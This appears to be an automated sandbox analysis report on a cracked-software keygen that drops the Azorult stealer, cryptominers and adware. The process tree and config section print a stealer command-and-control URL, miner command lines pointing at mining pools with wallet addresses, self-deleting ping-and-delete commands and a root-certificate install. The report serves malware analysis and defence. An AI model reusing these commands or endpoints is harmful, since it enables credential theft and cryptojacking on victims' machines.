Analysis
-
max time kernel
18s -
max time network
65s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 07:46
Static task
static1
Behavioral task
behavioral1
Sample
Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe
Resource
win10v20201028
General
-
Target
Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe
-
Size
5.4MB
-
MD5
baad366f257529076340afc66d1ac59c
-
SHA1
3dafcc431b85bd6a527e70879137e1f27e160849
-
SHA256
3f5a92454d1b626e24016329a9de52e40d78aae1e5977f53e820a2e2812d3975
-
SHA512
98d2e5ace89934ebc193ae6b8277b363d9d197a54bbcf6dfa3f40df2671d89c87e4d13737ea99eceb9a2a1ac3bd135ffa53d555f93f72ff2a36f1874cb94dd85
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 35 3984 cmd.exe -
Executes dropped EXE 10 IoCs
pid Process 3548 keygen-pr.exe 1200 keygen-step-1.exe 648 keygen-step-3.exe 504 keygen-step-4.exe 2876 key.exe 208 Setup.exe 3984 multitimer.exe 2064 setups.exe 812 askinstall20.exe 1540 setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 1540 setups.tmp 1540 setups.tmp 1540 setups.tmp 1540 setups.tmp 1540 setups.tmp 1540 setups.tmp 1540 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 90 api.ipify.org 158 ipinfo.io 160 ipinfo.io -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
pid Process 4116 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 3624 PING.EXE 5272 PING.EXE 2552 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 159 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 168 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1540 setups.tmp 1540 setups.tmp -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 208 Setup.exe Token: SeCreateTokenPrivilege 812 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 812 askinstall20.exe Token: SeLockMemoryPrivilege 812 askinstall20.exe Token: SeIncreaseQuotaPrivilege 812 askinstall20.exe Token: SeMachineAccountPrivilege 812 askinstall20.exe Token: SeTcbPrivilege 812 askinstall20.exe Token: SeSecurityPrivilege 812 askinstall20.exe Token: SeTakeOwnershipPrivilege 812 askinstall20.exe Token: SeLoadDriverPrivilege 812 askinstall20.exe Token: SeSystemProfilePrivilege 812 askinstall20.exe Token: SeSystemtimePrivilege 812 askinstall20.exe Token: SeProfSingleProcessPrivilege 812 askinstall20.exe Token: SeIncBasePriorityPrivilege 812 askinstall20.exe Token: SeCreatePagefilePrivilege 812 askinstall20.exe Token: SeCreatePermanentPrivilege 812 askinstall20.exe Token: SeBackupPrivilege 812 askinstall20.exe Token: SeRestorePrivilege 812 askinstall20.exe Token: SeShutdownPrivilege 812 askinstall20.exe Token: SeDebugPrivilege 812 askinstall20.exe Token: SeAuditPrivilege 812 askinstall20.exe Token: SeSystemEnvironmentPrivilege 812 askinstall20.exe Token: SeChangeNotifyPrivilege 812 askinstall20.exe Token: SeRemoteShutdownPrivilege 812 askinstall20.exe Token: SeUndockPrivilege 812 askinstall20.exe Token: SeSyncAgentPrivilege 812 askinstall20.exe Token: SeEnableDelegationPrivilege 812 askinstall20.exe Token: SeManageVolumePrivilege 812 askinstall20.exe Token: SeImpersonatePrivilege 812 askinstall20.exe Token: SeCreateGlobalPrivilege 812 askinstall20.exe Token: 31 812 askinstall20.exe Token: 32 812 askinstall20.exe Token: 33 812 askinstall20.exe Token: 34 812 askinstall20.exe Token: 35 812 askinstall20.exe Token: SeDebugPrivilege 3984 multitimer.exe Token: SeDebugPrivilege 4116 taskkill.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2064 setups.exe 1540 setups.tmp 3900 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 1032 wrote to memory of 1628 1032 Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe 79 PID 1032 wrote to memory of 1628 1032 Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe 79 PID 1032 wrote to memory of 1628 1032 Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe 79 PID 1628 wrote to memory of 3548 1628 cmd.exe 82 PID 1628 wrote to memory of 3548 1628 cmd.exe 82 PID 1628 wrote to memory of 3548 1628 cmd.exe 82 PID 1628 wrote to memory of 1200 1628 cmd.exe 83 PID 1628 wrote to memory of 1200 1628 cmd.exe 83 PID 1628 wrote to memory of 1200 1628 cmd.exe 83 PID 1628 wrote to memory of 648 1628 cmd.exe 84 PID 1628 wrote to memory of 648 1628 cmd.exe 84 PID 1628 wrote to memory of 648 1628 cmd.exe 84 PID 1628 wrote to memory of 504 1628 cmd.exe 85 PID 1628 wrote to memory of 504 1628 cmd.exe 85 PID 1628 wrote to memory of 504 1628 cmd.exe 85 PID 3548 wrote to memory of 2876 3548 keygen-pr.exe 86 PID 3548 wrote to memory of 2876 3548 keygen-pr.exe 86 PID 3548 wrote to memory of 2876 3548 keygen-pr.exe 86 PID 504 wrote to memory of 208 504 keygen-step-4.exe 87 PID 504 wrote to memory of 208 504 keygen-step-4.exe 87 PID 648 wrote to memory of 3736 648 keygen-step-3.exe 88 PID 648 wrote to memory of 3736 648 keygen-step-3.exe 88 PID 648 wrote to memory of 3736 648 keygen-step-3.exe 88 PID 3736 wrote to memory of 3624 3736 cmd.exe 91 PID 3736 wrote to memory of 3624 3736 cmd.exe 91 PID 3736 wrote to memory of 3624 3736 cmd.exe 91 PID 2876 wrote to memory of 736 2876 key.exe 90 PID 2876 wrote to memory of 736 2876 key.exe 90 PID 2876 wrote to memory of 736 2876 key.exe 90 PID 208 wrote to memory of 3984 208 Setup.exe 92 PID 208 wrote to memory of 3984 208 Setup.exe 92 PID 208 wrote to memory of 2064 208 Setup.exe 93 PID 208 wrote to memory of 2064 208 Setup.exe 93 PID 208 wrote to memory of 2064 208 Setup.exe 93 PID 504 wrote to memory of 812 504 keygen-step-4.exe 94 PID 504 wrote to memory of 812 504 keygen-step-4.exe 94 PID 504 wrote to memory of 812 504 keygen-step-4.exe 94 PID 2064 wrote to memory of 1540 2064 setups.exe 95 PID 2064 wrote to memory of 1540 2064 setups.exe 95 PID 2064 wrote to memory of 1540 2064 setups.exe 95 PID 812 wrote to memory of 3952 812 askinstall20.exe 97 PID 812 wrote to memory of 3952 812 askinstall20.exe 97 PID 812 wrote to memory of 3952 812 askinstall20.exe 97 PID 3952 wrote to memory of 4116 3952 cmd.exe 101 PID 3952 wrote to memory of 4116 3952 cmd.exe 101 PID 3952 wrote to memory of 4116 3952 cmd.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe"C:\Users\Admin\AppData\Local\Temp\Tocoman.Ilink.4.For.Tekla.Stru.crack.by.CORE.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1200
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:3624
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Users\Admin\AppData\Local\Temp\OL79RW20MU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OL79RW20MU\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\OL79RW20MU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OL79RW20MU\multitimer.exe" 1 3.1617436088.60681db886a35 1016⤵PID:4680
-
C:\Users\Admin\AppData\Local\Temp\OL79RW20MU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OL79RW20MU\multitimer.exe" 2 3.1617436088.60681db886a357⤵PID:4828
-
C:\Users\Admin\AppData\Local\Temp\1w2jcju40md\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\1w2jcju40md\KiffApp1.exe"8⤵PID:6028
-
-
C:\Users\Admin\AppData\Local\Temp\qy34szky4dt\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\qy34szky4dt\cpyrix.exe" /VERYSILENT8⤵PID:6068
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:2184
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:6272
-
-
-
C:\Users\Admin\AppData\Local\Temp\k3fsn2v5dja\vict.exe"C:\Users\Admin\AppData\Local\Temp\k3fsn2v5dja\vict.exe" /VERYSILENT /id=5358⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\is-FIJJE.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-FIJJE.tmp\vict.tmp" /SL5="$90328,870426,780800,C:\Users\Admin\AppData\Local\Temp\k3fsn2v5dja\vict.exe" /VERYSILENT /id=5359⤵PID:5564
-
C:\Users\Admin\AppData\Local\Temp\is-MM6VJ.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-MM6VJ.tmp\win1host.exe" 53510⤵PID:6100
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rrc1ngt1her\vpn.exe"C:\Users\Admin\AppData\Local\Temp\rrc1ngt1her\vpn.exe" /silent /subid=4828⤵PID:5068
-
C:\Users\Admin\AppData\Local\Temp\is-2KM58.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-2KM58.tmp\vpn.tmp" /SL5="$1032C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\rrc1ngt1her\vpn.exe" /silent /subid=4829⤵PID:5608
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5340
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:4600
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vhhschbzj0g\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\vhhschbzj0g\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\is-C6R28.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-C6R28.tmp\IBInstaller_97039.tmp" /SL5="$10388,14574851,721408,C:\Users\Admin\AppData\Local\Temp\vhhschbzj0g\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5656
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-ROOKA.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5084
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-ROOKA.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:740
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\spspu1lgkhs\ljdrqj2wsw5.exe"C:\Users\Admin\AppData\Local\Temp\spspu1lgkhs\ljdrqj2wsw5.exe" /quiet SILENT=1 AF=7568⤵PID:5280
-
-
C:\Users\Admin\AppData\Local\Temp\dflgplvjdcp\app.exe"C:\Users\Admin\AppData\Local\Temp\dflgplvjdcp\app.exe" /8-238⤵PID:5372
-
-
C:\Users\Admin\AppData\Local\Temp\rwvi4l14pew\wuqty4ujy34.exe"C:\Users\Admin\AppData\Local\Temp\rwvi4l14pew\wuqty4ujy34.exe"8⤵PID:5064
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\rwvi4l14pew\wuqty4ujy34.exe"9⤵PID:5320
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:2552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\q24o0q103qz\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\q24o0q103qz\Setup3310.exe" /Verysilent /subid=5778⤵PID:6092
-
-
C:\Users\Admin\AppData\Local\Temp\3rzoe4nshb3\mqohoim1vrx.exe"C:\Users\Admin\AppData\Local\Temp\3rzoe4nshb3\mqohoim1vrx.exe" /ustwo INSTALL8⤵PID:6060
-
-
C:\Users\Admin\AppData\Local\Temp\yxhulwqcz43\53bssixy35w.exe"C:\Users\Admin\AppData\Local\Temp\yxhulwqcz43\53bssixy35w.exe" /VERYSILENT8⤵PID:6052
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LGZWJFCPK5\setups.exe"C:\Users\Admin\AppData\Local\Temp\LGZWJFCPK5\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Users\Admin\AppData\Local\Temp\is-I0CLP.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-I0CLP.tmp\setups.tmp" /SL5="$5017E,635399,250368,C:\Users\Admin\AppData\Local\Temp\LGZWJFCPK5\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1540
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵PID:4672
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4784
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:4888
-
C:\Users\Admin\AppData\Roaming\A50F.tmp.exe"C:\Users\Admin\AppData\Roaming\A50F.tmp.exe"5⤵PID:5028
-
C:\Users\Admin\AppData\Roaming\A50F.tmp.exe"C:\Users\Admin\AppData\Roaming\A50F.tmp.exe"6⤵PID:1840
-
-
-
C:\Users\Admin\AppData\Roaming\A724.tmp.exe"C:\Users\Admin\AppData\Roaming\A724.tmp.exe"5⤵PID:3960
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:5220
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5688
-
-
-
C:\Users\Admin\AppData\Roaming\A83E.tmp.exe"C:\Users\Admin\AppData\Roaming\A83E.tmp.exe"5⤵PID:4736
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵
- Blocklisted process makes network request
PID:3984 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:5144
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3900
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4140
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4436
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5044
-
C:\Users\Admin\AppData\Local\Temp\is-CPIQ8.tmp\53bssixy35w.tmp"C:\Users\Admin\AppData\Local\Temp\is-CPIQ8.tmp\53bssixy35w.tmp" /SL5="$30310,2592217,780800,C:\Users\Admin\AppData\Local\Temp\yxhulwqcz43\53bssixy35w.exe" /VERYSILENT1⤵PID:5512
-
C:\Users\Admin\AppData\Local\Temp\is-HH0C1.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-HH0C1.tmp\winlthsth.exe"2⤵PID:5652
-
-
C:\Users\Admin\AppData\Local\Temp\is-4RSTS.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-4RSTS.tmp\Setup3310.tmp" /SL5="$20320,138429,56832,C:\Users\Admin\AppData\Local\Temp\q24o0q103qz\Setup3310.exe" /Verysilent /subid=5771⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\is-3ALLU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3ALLU.tmp\Setup.exe" /Verysilent2⤵PID:5020
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:3956
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:428
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:4848
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\is-K2CLQ.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-K2CLQ.tmp\LabPicV3.tmp" /SL5="$203CA,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:2528
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:5452
-
C:\Users\Admin\AppData\Local\Temp\is-B6VJO.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-B6VJO.tmp\lylal220.tmp" /SL5="$203D6,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"4⤵PID:6352
-
-
-
